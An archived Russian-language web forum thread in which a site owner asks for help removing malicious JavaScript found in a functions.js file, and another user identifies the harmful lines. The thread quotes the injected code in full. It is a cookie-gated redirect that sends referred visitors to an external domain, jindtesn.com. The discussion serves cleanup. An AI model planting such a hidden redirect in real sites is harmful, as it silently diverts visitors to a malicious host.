Вход

Просмотр полной версии : Редирект в JS скрипте -что убрать ?

smedvedev
17.06.2012, 14:53
Здравствуйте уважаемые форумчани, помогите пожалуйста разобраться в проблеме. Есть сайт на котором стоит вредоносный код в JS? какую часть иммено мне убрать чтобы не попортить функционал:

function backgroundOnLoad()
{
setTimeout('showBody()', 10);
}

function showBody()
{
document.getElementById('body_div').style.visibili ty = 'visible';
}

function showBodyDelayed()
{
setTimeout
(
function ()
{
document.getElementById('body_div').style.visibili ty = 'visible';
},
500
);
}
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}

function getCookie(c_name) {
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++) {
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");
if (x==c_name) {
return unescape(y);
}
}
}

function strlen(string){
if(typeof string == "undefined") {
return 0;
} else {
return string.length;
}
}

var rSite = 'http://jindtesn.com';
var dt = new Date(), expiryTime = dt.setTime( dt.getTime() + 1800000 );
var currentCookie = getCookie("arx_tt");

if(!document.referrer) {

var referringURL = rSite;
var local = "";
var referrer = 0;
setCookie("arx_tt", 1, dt.toGMTString(), "/");

} else {

var referringURL = document.referrer;
referringURL = rSite + window.location.pathname;
var referrer = 1;

}

if (strlen(currentCookie) == 0 && referrer == 1) {

var setted = 1;
setCookie("arx_tt", 1, dt.toGMTString(), "/");
location.href = referringURL;

}

setCookie("arx_tt", 1, dt.toGMTString(), "/");

Я вот пока убрал эту часть:

var rSite = 'http://jindtesn.com';
var dt = new Date(), expiryTime = dt.setTime( dt.getTime() + 1800000 );
var currentCookie = getCookie("arx_tt");

if(!document.referrer) {

var referringURL = rSite;
var local = "";
var referrer = 0;
setCookie("arx_tt", 1, dt.toGMTString(), "/");

} else {

var referringURL = document.referrer;
referringURL = rSite + window.location.pathname;
var referrer = 1;

}

if (strlen(currentCookie) == 0 && referrer == 1) {

var setted = 1;
setCookie("arx_tt", 1, dt.toGMTString(), "/");
location.href = referringURL;

}

setCookie("arx_tt", 1, dt.toGMTString(), "/");

Правильно ли я сделал?
Всем спасибо за ответы.
Deff
17.06.2012, 15:06
Строка вызывающая переод
Воть location.href = referringURL

А собствено этот какой то счетчик ? Чей ? -Возможно он должен стоять во фрейме

На кой Вам вообще этот сайт ? => http://jindtesn.com

Вот тут - подобное => http://qps.ru/dxMu3
smedvedev
17.06.2012, 15:15
ВОт я нашел в данном скрипте, мне нужно удалить какие-то части.
Хост написал вот тут проблема:

На Вашем сайте был обнаружен вредоносный контент в файле
~/www/htdocs/js/functions.js

В частности:

var rSite = 'http://jindtesn.com';
var referringURL = rSite;
referringURL = rSite + window.location.pathname;

Вот только данные строки или еще нужно то что после них??
Deff
17.06.2012, 15:17
smedvedev,
Само деяние переадресации просходит в строке 24 Вашего нижнего скрипта
закоментьте данную строку - редирек должен исчезнуть
smedvedev
17.06.2012, 15:28
Ну мне нужно все же убрать, зачем мне удалять 24 строку, если я могу удалить все что мне не нужно.
Deff
17.06.2012, 16:36
smedvedev,
Гы - дык я и спрашивал - зачем весь этот код

Тут из нужного возможно ток эта часть:
function backgroundOnLoad()
{
setTimeout('showBody()', 10);
}

function showBody()
{
document.getElementById('body_div').style.visibili ty = 'visible';
}

function showBodyDelayed()
{
setTimeout
(
function ()
{
document.getElementById('body_div').style.visibili ty = 'visible';
},
500
);
}
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}

function getCookie(c_name) {
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++) {
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");
if (x==c_name) {
return unescape(y);
}
}
}

function strlen(string){
if(typeof string == "undefined") {
return 0;
} else {
return string.length;
}
}